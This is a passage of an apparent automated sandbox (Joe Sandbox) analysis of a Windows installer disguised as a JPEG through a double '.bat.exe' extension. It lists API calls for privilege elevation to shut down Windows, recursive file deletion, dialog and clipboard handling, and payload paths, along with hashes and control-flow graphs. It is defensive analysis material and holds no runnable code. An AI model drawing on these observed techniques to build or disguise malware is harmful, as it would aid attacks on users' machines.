                                    • Part of subcall function 00403798: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244,1033,spidskaalshoved Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,spidskaalshoved Setup: Installing,00000000,00000002,75953410), ref: 00403888
                                    • Part of subcall function 00403798: lstrcmpiA.KERNEL32(?,.exe), ref: 0040389B
                                    • Part of subcall function 00403798: GetFileAttributesA.KERNEL32(Call), ref: 004038A6
                                    • Part of subcall function 00403798: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244), ref: 004038EF
                                    • Part of subcall function 00403798: RegisterClassA.USER32(00422EA0), ref: 0040392C
                                    • Part of subcall function 004036BE: CloseHandle.KERNEL32(000002D0,004034F5,?,?,00000006,00000008,0000000A), ref: 004036C9
                                  • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004034F5
                                  • ExitProcess.KERNEL32 ref: 00403516
                                  • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403633
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040363A
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403652
                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403671
                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403695
                                  • ExitProcess.KERNEL32 ref: 004036B8
                                    • Part of subcall function 00405686: MessageBoxIndirectA.USER32(00409218), ref: 004056E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                  • String ID: "$"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers$C:\Users\user\Desktop$C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                  • API String ID: 3776617018-16146374
                                  • Opcode ID: 7bcbbf229ff0261bcc06b89522b60a706fee5f29980eef449c06c54d38326c76
                                  • Instruction ID: 9e312bc3f5d3d37e61d45afab2cefd1cff230aa7333539c56d086af75f350ab7
                                  • Opcode Fuzzy Hash: 7bcbbf229ff0261bcc06b89522b60a706fee5f29980eef449c06c54d38326c76
                                  • Instruction Fuzzy Hash: 90C106706082426AE7216F719D4DB2B3EACEB85706F04457FF581B61E2C77C8A05CB2E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 134 4051cf-4051eb 135 4051f1-4052b8 GetDlgItem * 3 call 40403e call 40492f GetClientRect GetSystemMetrics SendMessageA * 2 134->135 136 40537a-405380 134->136 158 4052d6-4052d9 135->158 159 4052ba-4052d4 SendMessageA * 2 135->159 138 405382-4053a4 GetDlgItem CreateThread FindCloseChangeNotification 136->138 139 4053aa-4053b6 136->139 138->139 141 4053d8-4053de 139->141 142 4053b8-4053be 139->142 146 4053e0-4053e6 141->146 147 405433-405436 141->147 144 4053c0-4053d3 ShowWindow * 2 call 40403e 142->144 145 4053f9-405400 call 404070 142->145 144->141 155 405405-405409 145->155 152 4053e8-4053f4 call 403fe2 146->152 153 40540c-40541c ShowWindow 146->153 147->145 150 405438-40543e 147->150 150->145 160 405440-405453 SendMessageA 150->160 152->145 156 40542c-40542e call 403fe2 153->156 157 40541e-405427 call 405091 153->157 156->147 157->156 163 4052e9-405300 call 404009 158->163 164 4052db-4052e7 SendMessageA 158->164 159->158 165 405550-405552 160->165 166 405459-405485 CreatePopupMenu call 405f8c AppendMenuA 160->166 171 405302-405316 ShowWindow 163->171 172 405336-405357 GetDlgItem SendMessageA 163->172 164->163 165->155 173 405487-405497 GetWindowRect 166->173 174 40549a-4054b0 TrackPopupMenu 166->174 175 405325 171->175 176 405318-405323 ShowWindow 171->176 172->165 178 40535d-405375 SendMessageA * 2 172->178 173->174 174->165 177 4054b6-4054d0 174->177 179 40532b-405331 call 40403e 175->179 176->179 180 4054d5-4054f0 SendMessageA 177->180 178->165 179->172 180->180 181 4054f2-405512 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 180->181 183 405514-405534 SendMessageA 181->183 183->183 184 405536-40554a GlobalUnlock SetClipboardData CloseClipboard 183->184 184->165
                                  APIs
                                  • GetDlgItem.USER32(?,00000403), ref: 0040522E
                                  • GetDlgItem.USER32(?,000003EE), ref: 0040523D
                                  • GetClientRect.USER32(?,?), ref: 0040527A
                                  • GetSystemMetrics.USER32(00000002), ref: 00405281
                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052A2
                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052B3
                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052C6
                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052D4
                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052E7
                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405309
                                  • ShowWindow.USER32(?,00000008), ref: 0040531D
                                  • GetDlgItem.USER32(?,000003EC), ref: 0040533E
                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040534E
                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405367
                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405373
                                  • GetDlgItem.USER32(?,000003F8), ref: 0040524C
                                    • Part of subcall function 0040403E: SendMessageA.USER32(00000028,?,00000001,00403E6E), ref: 0040404C
                                  • GetDlgItem.USER32(?,000003EC), ref: 0040538F
                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005163,00000000), ref: 0040539D
                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004053A4
                                  • ShowWindow.USER32(00000000), ref: 004053C7
                                  • ShowWindow.USER32(?,00000008), ref: 004053CE
                                  • ShowWindow.USER32(00000008), ref: 00405414
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405448
                                  • CreatePopupMenu.USER32 ref: 00405459
                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040546E
                                  • GetWindowRect.USER32(?,000000FF), ref: 0040548E
                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A7
                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054E3
                                  • OpenClipboard.USER32(00000000), ref: 004054F3
                                  • EmptyClipboard.USER32 ref: 004054F9
                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405502
                                  • GlobalLock.KERNEL32(00000000), ref: 0040550C
                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405520
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405539
                                  • SetClipboardData.USER32(00000001,00000000), ref: 00405544
                                  • CloseClipboard.USER32 ref: 0040554A
                                  Strings
                                  • spidskaalshoved Setup: Installing, xrefs: 004054BF
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                  • String ID: spidskaalshoved Setup: Installing
                                  • API String ID: 4154960007-3911443157
                                  • Opcode ID: 7d0a8cd8e416168bcdd9cece761f9fa15a968798360528e6a780b83708fc3970
                                  • Instruction ID: 0e806a1c10c1a3103ec1b6ff030541c572903ae85d70ab094f2e75f2d1af7317
                                  • Opcode Fuzzy Hash: 7d0a8cd8e416168bcdd9cece761f9fa15a968798360528e6a780b83708fc3970
                                  • Instruction Fuzzy Hash: ABA15AB1900209BFDB219FA4DD89AAE7F79FB04355F10403AFA04B62A0C7B55E41DF69

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 493 405732-405758 call 4059f0 496 405771-405778 493->496 497 40575a-40576c DeleteFileA 493->497 499 40577a-40577c 496->499 500 40578b-40579b call 405f6a 496->500 498 4058fb-4058ff 497->498 501 405782-405785 499->501 502 4058a9-4058ae 499->502 508 4057aa-4057ab call 405949 500->508 509 40579d-4057a8 lstrcatA 500->509 501->500 501->502 502->498 504 4058b0-4058b3 502->504 506 4058b5-4058bb 504->506 507 4058bd-4058c5 call 40626d 504->507 506->498 507->498 516 4058c7-4058db call 405902 call 4056ea 507->516 511 4057b0-4057b3 508->511 509->511 514 4057b5-4057bc 511->514 515 4057be-4057c4 lstrcatA 511->515 514->515 517 4057c9-4057e7 lstrlenA FindFirstFileA 514->517 515->517 532 4058f3-4058f6 call 405091 516->532 533 4058dd-4058e0 516->533 519 4057ed-405804 call 40592d 517->519 520 40589f-4058a3 517->520 526 405806-40580a 519->526 527 40580f-405812 519->527 520->502 523 4058a5 520->523 523->502 526->527 529 40580c 526->529 530 405814-405819 527->530 531 405825-405833 call 405f6a 527->531 529->527 535 40581b-40581d 530->535 536 40587e-405890 FindNextFileA 530->536 543 405835-40583d 531->543 544 40584a-405855 call 4056ea 531->544 532->498 533->506 538 4058e2-4058f1 call 405091 call 405d49 533->538 535->531 539 40581f-405823 535->539 536->519 541 405896-405899 FindClose 536->541 538->498 539->531 539->536 541->520 543->536 547 40583f-405848 call 405732 543->547 552 405876-405879 call 405091 544->552 553 405857-40585a 544->553 547->536 552->536 555 40585c-40586c call 405091 call 405d49 553->555 556 40586e-405874 553->556 555->536 556->536
                                  APIs
                                  • DeleteFileA.KERNELBASE(?,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040575B
                                  • lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057A3
                                  • lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057C4
                                  • lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057CA
                                  • FindFirstFileA.KERNELBASE(00420D10,?,?,?,00409014,?,00420D10,?,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057DB
                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405888
                                  • FindClose.KERNEL32(00000000), ref: 00405899
                                  Strings
                                  • "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe", xrefs: 00405732
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040573F
                                  • \*.*, xrefs: 0040579D
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                  • String ID: "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                  • API String ID: 2035342205-4260017865
                                  • Opcode ID: e4d8cf6358702228609bce022f76a866bb8ad1d2f30bc98f97ca77bbe447c365
                                  • Instruction ID: 4530166bbd706fa81c440e6583376772d6fc270faa34d54a03d6882d8fc6be8c
                                  • Opcode Fuzzy Hash: e4d8cf6358702228609bce022f76a866bb8ad1d2f30bc98f97ca77bbe447c365
                                  • Instruction Fuzzy Hash: 7351B332904A09BADB216B728C45BAF7A78DF42714F14817BF841B11D2D73C8952DEA9
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 48b772c591d60bd120ceb21c558333e6da892a782e2c7f4c33aa573d96a0a8bb
                                  • Instruction ID: 5cdea38fe39661480990cc8a004f6d9d9bf1a0cca829e9caf547f016d39c1b54
                                  • Opcode Fuzzy Hash: 48b772c591d60bd120ceb21c558333e6da892a782e2c7f4c33aa573d96a0a8bb
                                  • Instruction Fuzzy Hash: 7BF17475D00229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF44
                                  APIs
                                  • FindFirstFileA.KERNELBASE(75953410,00421558,shovel\Undrinking.veg,00405A33,shovel\Undrinking.veg,shovel\Undrinking.veg,00000000,shovel\Undrinking.veg,shovel\Undrinking.veg,75953410,?,C:\Users\user\AppData\Local\Temp\,00405752,?,75953410,C:\Users\user\AppData\Local\Temp\), ref: 00406278
                                  • FindClose.KERNELBASE(00000000), ref: 00406284
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID: shovel\Undrinking.veg
                                  • API String ID: 2295610775-2939288235
                                  • Opcode ID: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
                                  • Instruction ID: 4b5b4fac396428ba6811cbdb79132df6df7f7590a8a38978907140e3512fee8b
                                  • Opcode Fuzzy Hash: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
                                  • Instruction Fuzzy Hash: 9AD012319190246BC3402B387D0C84B7B599B553317128B77F96BF16F0C3389C7286EA

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 185 403b35-403b47 186 403c88-403c97 185->186 187 403b4d-403b53 185->187 189 403ce6-403cfb 186->189 190 403c99-403ce1 GetDlgItem * 2 call 404009 SetClassLongA call 40140b 186->190 187->186 188 403b59-403b62 187->188 193 403b64-403b71 SetWindowPos 188->193 194 403b77-403b7a 188->194 191 403d3b-403d40 call 404055 189->191 192 403cfd-403d00 189->192 190->189 204 403d45-403d60 191->204 196 403d02-403d0d call 401389 192->196 197 403d33-403d35 192->197 193->194 199 403b94-403b9a 194->199 200 403b7c-403b8e ShowWindow 194->200 196->197 218 403d0f-403d2e SendMessageA 196->218 197->191 203 403fd6 197->203 205 403bb6-403bb9 199->205 206 403b9c-403bb1 DestroyWindow 199->206 200->199 208 403fd8-403fdf 203->208 214 403d62-403d64 call 40140b 204->214 215 403d69-403d6f 204->215 211 403bbb-403bc7 SetWindowLongA 205->211 212 403bcc-403bd2 205->212 209 403fb3-403fb9 206->209 209->203 220 403fbb-403fc1 209->220 211->208 216 403c75-403c83 call 404070 212->216 217 403bd8-403be9 GetDlgItem 212->217 214->215 221 403f94-403fad DestroyWindow EndDialog 215->221 222 403d75-403d80 215->222 216->208 223 403c08-403c0b 217->223 224 403beb-403c02 SendMessageA IsWindowEnabled 217->224 218->208 220->203 226 403fc3-403fcc ShowWindow 220->226 221->209 222->221 227 403d86-403dd3 call 405f8c call 404009 * 3 GetDlgItem 222->227 229 403c10-403c13 223->229 230 403c0d-403c0e 223->230 224->203 224->223 226->203 255 403dd5-403dda 227->255 256 403ddd-403e19 ShowWindow KiUserCallbackDispatcher call 40402b EnableWindow 227->256 234 403c21-403c26 229->234 235 403c15-403c1b 229->235 233 403c3e-403c43 call 403fe2 230->233 233->216 238 403c5c-403c6f SendMessageA 234->238 240 403c28-403c2e 234->240 235->238 239 403c1d-403c1f 235->239 238->216 239->233 243 403c30-403c36 call 40140b 240->243 244 403c45-403c4e call 40140b 240->244 253 403c3c 243->253 244->216 252 403c50-403c5a 244->252 252->253 253->233 255->256 259 403e1b-403e1c 256->259 260 403e1e 256->260 261 403e20-403e4e GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403e50-403e61 SendMessageA 261->262 263 403e63 261->263 264 403e69-403ea3 call 40403e call 403b16 call 405f6a lstrlenA call 405f8c SetWindowTextA call 401389 262->264 263->264 264->204 275 403ea9-403eab 264->275 275->204 276 403eb1-403eb5 275->276 277 403ed4-403ee8 DestroyWindow 276->277 278 403eb7-403ebd 276->278 277->209 279 403eee-403f1b CreateDialogParamA 277->279 278->203 280 403ec3-403ec9 278->280 279->209 282 403f21-403f78 call 404009 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 279->282 280->204 281 403ecf 280->281 281->203 282->203 287 403f7a-403f8d ShowWindow call 404055 282->287 289 403f92 287->289 289->209
                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B71
                                  • ShowWindow.USER32(?), ref: 00403B8E
                                  • DestroyWindow.USER32 ref: 00403BA2
                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BBE
                                  • GetDlgItem.USER32(?,?), ref: 00403BDF
                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BF3
                                  • IsWindowEnabled.USER32(00000000), ref: 00403BFA
                                  • GetDlgItem.USER32(?,00000001), ref: 00403CA8
                                  • GetDlgItem.USER32(?,00000002), ref: 00403CB2
                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403CCC
                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D1D
                                  • GetDlgItem.USER32(?,00000003), ref: 00403DC3
                                  • ShowWindow.USER32(00000000,?), ref: 00403DE4
                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DF6
                                  • EnableWindow.USER32(?,?), ref: 00403E11
                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E27
                                  • EnableMenuItem.USER32(00000000), ref: 00403E2E
                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E46
                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E59
                                  • lstrlenA.KERNEL32(spidskaalshoved Setup: Installing,?,spidskaalshoved Setup: Installing,00000000), ref: 00403E83
                                  • SetWindowTextA.USER32(?,spidskaalshoved Setup: Installing), ref: 00403E92
                                  • ShowWindow.USER32(?,0000000A), ref: 00403FC6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                  • String ID: spidskaalshoved Setup: Installing
                                  • API String ID: 3282139019-3911443157
                                  • Opcode ID: 0c1a0b4012b528e3d1e15867ad5d8e725077cdc308248a61195f66e94d999680
                                  • Instruction ID: ece9219a4d70184b68c45d6c06b8272552e5c94251c83fd0e936414de4f8c744
                                  • Opcode Fuzzy Hash: 0c1a0b4012b528e3d1e15867ad5d8e725077cdc308248a61195f66e94d999680
                                  • Instruction Fuzzy Hash: 7AC1C0B1A04205BBDB206F61EE48E2B3E7DFB45706F40453EF601B11E1C779A9429B6E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
